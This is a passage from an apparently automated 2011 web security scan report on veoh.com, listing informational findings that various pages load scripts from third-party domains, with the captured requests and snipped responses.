Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:12 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=97
Content-Length: 25409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

19.452. http://www.veoh.com/help  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /help

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /help HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=16
Content-Length: 24102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

19.453. http://www.veoh.com/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /login

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /login HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:45:54 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 25417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

19.454. http://www.veoh.com/messages/inbox  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /messages/inbox

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /messages/inbox HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:09 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 25409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

19.455. http://www.veoh.com/metrics/logadevent  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /metrics/logadevent

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /metrics/logadevent HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:44:56 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=59
Content-Length: 28568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

19.456. http://www.veoh.com/myinterests  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /myinterests

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /myinterests HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 25409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

19.457. http://www.veoh.com/myplaylists  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /myplaylists

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /myplaylists HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 25387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

19.458. http://www.veoh.com/myprofile/videos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /myprofile/videos

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /myprofile/videos HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:18 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=56
Content-Length: 25399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

19.459. http://www.veoh.com/publish/video  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /publish/video

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /publish/video HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=71
Content-Length: 25294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

19.460. http://www.veoh.com/register  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /register

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /register HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:45:51 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 52657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript"
src="http://api.recaptcha.net/challenge?k=6LcgyQAAAAAAAOcV5HwRlHcP2Z_SEJ4HDmPaiBJL">

</script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

19.461. http://www.veoh.com/search/videos/q/-MENUVALUE-  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /search/videos/q/-MENUVALUE-

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search/videos/q/-MENUVALUE- HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:08 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=63
Content-Length: 57062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769628"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.462. http://www.veoh.com/search/videos/q/publisher:bunny12344  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /search/videos/q/publisher:bunny12344

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search/videos/q/publisher:bunny12344 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:05 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=79
Content-Length: 72609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
